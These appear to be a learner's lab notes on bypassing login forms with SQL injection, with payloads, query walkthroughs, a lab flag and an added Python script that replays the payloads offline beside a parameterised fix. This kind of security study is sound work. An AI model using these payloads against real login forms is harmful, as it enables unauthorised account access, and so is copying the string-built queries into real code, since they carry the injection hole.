AUTHENTICATION BYPASS
root@oco:~$ BROWSER > {targetSite:port}
username field: admin' OR '1'='1
password field: unknown
* SQL: SELECT * FROM logins WHERE username='admin' OR '1'='1' AND password='unknown';
* as per the diagram, the AND condition is evaluated first (AND binds tighter than OR), so the
DB reads the WHERE clause as: username='admin' OR ('1'='1' AND password='unknown')
* the right-hand side is FALSE because the password is wrong, but the left-hand side
username='admin' is TRUE on its own as long as that user exists in the DB, so the admin row is
returned and the password becomes unnecessary
* the single quote in admin' is used to escape the bounds of the user-input field; the closing
quote after '1'='1 is the one the application appends itself
root@oco:~$ BROWSER > {targetSite:port}
username field: tom' OR '1'='1--
password field: ' OR '1'='1
* SQL: SELECT * FROM logins WHERE username='tom' OR '1'='1--' AND password = '' OR '1'='1';
* ALT: username field: tom')-- -
password field: ' OR '1'='1
- SQLI: SELECT * FROM logins WHERE (username='tom')-- -' AND id > 1) AND password = '1e54e11980633c7d1fb8a6be99e3e294';
Login successful as user: tom
* the single quote in tom' is used to escape the bounds of the user-input
* everything in the query after the comment -- is ignored!
- caveat: in MySQL/MariaDB the -- comment only counts when it is followed by whitespace. in the
first version the application appends its own closing quote, so the query ends in --' which is
NOT a comment; that login still works only because the password field also injects OR '1'='1.
the ALTERNATE version uses -- - so the comment always takes effect
* in the ALTERNATE version, the injected ) closes the parenthesis the application itself opened
around (username='...' AND id > 1); the comment then discards the rest of that condition and
the whole password check
* the 1e54e11980633c7d1fb8a6be99e3e294 is the MD5 hash of ' OR '1'='1
* also in the ALTERNATE version, the application checks that the user's id is always greater
than 1 to prevent anyone logging in as admin (id 1)
* additionally, the password field is hashed before being used in the query
- this prevents the attacker from injecting through the password field, because the input is
replaced by its hash (hex digits only) before it reaches the SQL
root@oco:~$ BROWSER > {targetSite:port}
username field: ' OR '1'='1
password field: ' OR '1'='1
* SQL: SELECT * FROM logins WHERE username='' OR '1'='1' AND password='' OR '1'='1';
* since every row satisfies the condition, whichever row the DB returns first (usually the
lowest id, typically admin) is the one logged in
* the single quote in ' OR ... is used to escape the bounds of the user-input
root@oco:~$ BROWSER > http://94.237.63.224:40530/
username field: ' OR 1=1 LIMIT 1-- -'
* ALT: ' OR 1=1-- -'
* ALT: ' OR 1=1-- -
- Anything after the -- - becomes a comment, so the single quote after the dash (-') is just
part of the comment; nothing special
password field: unknown
* the password field isn't important as it will be ignored by the comment
* SQL: SELECT * FROM users WHERE username='username' AND password='password';
* SQLI: SELECT * FROM users WHERE username='' OR 1=1 LIMIT 1-- -' AND password='password';
* SQLI: SELECT * FROM users WHERE username='' OR 1=1-- -' AND password='password';
- the LIMIT 1 version is for applications that fail when the query returns more than one row;
it hands back only the first match
root@oco:~$ BROWSER > {targetSite:port}
username field: admin'-- -
password field: ' OR '1'='1
* if an SQL syntax error is received, it is a good indication that the application wraps the
username check in parentheses together with another condition, such as id > 1, which prevents
ANYONE from logging in as admin: the comment cut off the closing ) and left the query unbalanced
- use the ALTERNATE BYPASS METHOD (close the parenthesis with ) first, then comment) in order to
comment out the condition statement id > 1
root@oco:~$ BROWSER > {targetSite:port}
username field: admin')-- -
password field: ' OR '1'='1
* SQLI: SELECT * FROM logins WHERE (username='admin')-- -' AND id > 1) AND password = '1e54e11980633c7d1fb8a6be99e3e294';
* in MySQL, the -- comment used in SQLI must be followed by whitespace: (-- ) with a space at
the end, or (-- -) so the space is visibly there and cannot be trimmed by the browser or the
application (# also works as a comment in MySQL)
- these comments are sometimes URL encoded, with + (or %20) representing the space
* in SQL, parentheses are used when the application needs to check a particular condition
before others: expressions within the parentheses take precedence over the other operators
& are evaluated first
root@oco:~$ BROWSER > {targetSite:port}
username field: ' OR id=5)-- -
password field: ' OR '1'='1
* effective SQL (what the DB actually evaluates): SELECT * FROM logins WHERE (username='' OR id=5)
* full SQLI: SELECT * FROM logins WHERE (username='' OR id=5)-- -' AND id > 1) AND password = '1e54e11980633c7d1fb8a6be99e3e294';
* Login successful as user: superadmin
- Here's the flag: cdad9ecdf6f14b45ff5c4de32909caec
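Added example, not part of the original notes and not the lab's own code: replays the payloads above against a throwaway SQLite database so the precedence, comment, parenthesis and MD5 behaviour can be checked offline, and puts the parameterised query that rejects all of them next to the vulnerable ones. Assumptions: a table named logins with columns id, username, password; three constructed users (admin id 1, tom id 2, superadmin id 5); the function names login_plain, login_guarded and login_safe are my own. SQLite accepts -- without a trailing space, so the MySQL -- - requirement is not exercised here, but the payloads are kept as written in the notes.

```python
import hashlib
import sqlite3

# Constructed sample data (not from the notes): id 1 is the admin that the
# "id > 1" guard in the later queries is meant to protect.
USERS = [(1, "admin", "s3cret"), (2, "tom", "tomspassword"), (5, "superadmin", "hunter2")]


def md5(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def make_db(hash_passwords: bool = True) -> sqlite3.Connection:
    """In-memory 'logins' table. The first app version in the notes compares plaintext
    passwords, the later one stores and compares MD5 hashes."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE logins (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO logins VALUES (?, ?, ?)",
                   [(i, u, md5(p) if hash_passwords else p) for i, u, p in USERS])
    return db


def run(db: sqlite3.Connection, query: str):
    """Username of the first matching row, None when nothing matches, or
    'SQL ERROR' when the injected input left the statement unbalanced."""
    try:
        row = db.execute(query).fetchone()
    except sqlite3.Error:
        return "SQL ERROR"
    return row[0] if row else None


def login_plain(db, username, password):
    """First query form in the notes: string-built, plaintext password, no parentheses.
    admin' OR '1'='1 works because AND binds tighter than OR, leaving username='admin' alone."""
    query = f"SELECT username FROM logins WHERE username='{username}' AND password='{password}'"
    return run(db, query)


def login_guarded(db, username, password):
    """Later query form in the notes: username check parenthesised with an 'id > 1' guard
    against admin, and the password MD5-hashed before it reaches the SQL, which is why the
    password field can no longer be used for injection."""
    query = (f"SELECT username FROM logins WHERE (username='{username}' AND id > 1) "
             f"AND password='{md5(password)}'")
    return run(db, query)


def login_safe(db, username, password):
    """Hardened form: bound parameters keep quotes, parentheses and -- inside the string
    value, so none of the payloads change the structure of the query."""
    row = db.execute("SELECT username FROM logins WHERE (username=? AND id > 1) AND password=?",
                     (username, md5(password))).fetchone()
    return row[0] if row else None


# The username/password pairs from the notes, in the order they appear.
PAYLOADS = [
    ("admin' OR '1'='1", "unknown"),
    ("' OR '1'='1", "' OR '1'='1"),
    ("admin'-- -", "' OR '1'='1"),
    ("tom')-- -", "' OR '1'='1"),
    ("admin')-- -", "unknown"),
    ("' OR id=5)-- -", "unknown"),
]

if __name__ == "__main__":
    plain_db, hashed_db = make_db(hash_passwords=False), make_db()
    for user, pw in PAYLOADS:
        print(f"{user!r:22} -> plain: {login_plain(plain_db, user, pw)!s:10}"
              f" guarded: {login_guarded(hashed_db, user, pw)!s:10}"
              f" safe: {login_safe(hashed_db, user, pw)}")
```

Running it shows the three behaviours the notes describe side by side: admin'-- - raises a syntax error against the parenthesised query, the ')-- - variants close the parenthesis and throw away both the id > 1 guard and the password check, and the hashed password field stops matching anything once it is injected into. The bound-parameter version returns None for every payload and only logs in tom with his real password.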